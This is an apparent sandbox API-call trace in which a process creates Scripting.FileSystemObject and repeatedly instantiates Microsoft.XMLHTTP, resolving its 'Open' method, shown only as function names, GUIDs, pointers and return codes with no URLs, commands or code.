	[0437.950] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0437.950] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0437.950] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0437.950] ??2@YAPEAX_K@Z () returned 0x62f350
	[0437.950] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0437.950] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0437.950] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0437.950] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0437.950] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0437.951] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0437.951] SysStringLen (param_1=0x0) returned 0x0
	[0437.951] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0437.954] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0437.954] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0437.954] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0437.954] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0437.954] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0437.954] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0438.324] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0438.324] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0438.324] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0438.325] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0438.325] SysStringLen (param_1=0x0) returned 0x0
	[0438.325] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0438.326] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0438.326] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7500) returned 0x0
	[0438.326] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0438.326] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0438.326] ??2@YAPEAX_K@Z () returned 0x62f310
	[0438.326] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0438.326] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0438.326] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0438.326] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7500) returned 0x0
	[0438.326] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7500) returned 0x3
	[0438.326] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0438.326] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0438.328] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0438.329] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0438.329] SysStringLen (param_1=0x0) returned 0x0
	[0438.329] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0438.329] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0438.329] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74a0) returned 0x0
	[0438.329] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0438.329] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0438.329] ??2@YAPEAX_K@Z () returned 0x62f330
	[0438.329] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0438.329] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0438.329] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0438.329] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74a0) returned 0x0
	[0438.329] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74a0) returned 0x3
	[0438.329] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0438.329] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0438.329] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0438.330] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0438.330] SysStringLen (param_1=0x0) returned 0x0
	[0438.330] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0438.330] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0438.330] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0438.330] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0438.330] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0438.330] ??2@YAPEAX_K@Z () returned 0x62f310
	[0438.330] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0438.330] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0438.330] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0438.330] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0438.330] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0438.330] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0438.330] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0438.330] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0438.331] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0438.331] SysStringLen (param_1=0x0) returned 0x0
	[0438.331] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0438.331] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0438.331] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0438.331] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0438.331] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0438.331] ??2@YAPEAX_K@Z () returned 0x62f330
	[0438.331] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0438.331] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0438.331] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0438.331] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0438.331] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0438.331] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0438.331] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0438.331] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0438.331] longjmp () 
	[0438.332] longjmp () 
	[0438.694] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0438.694] SysStringLen (param_1=0x0) returned 0x0
	[0438.694] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0438.694] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0438.694] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74a0) returned 0x0
	[0438.694] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0438.694] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0438.694] ??2@YAPEAX_K@Z () returned 0x62f310
	[0438.694] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f310) 
	[0438.694] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0438.694] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0438.694] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74a0) returned 0x0
	[0438.694] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74a0) returned 0x3
	[0438.694] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0438.695] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0438.695] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0438.695] longjmp () 
	[0438.695] longjmp () 
	[0438.695] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0438.695] SysStringLen (param_1=0x0) returned 0x0
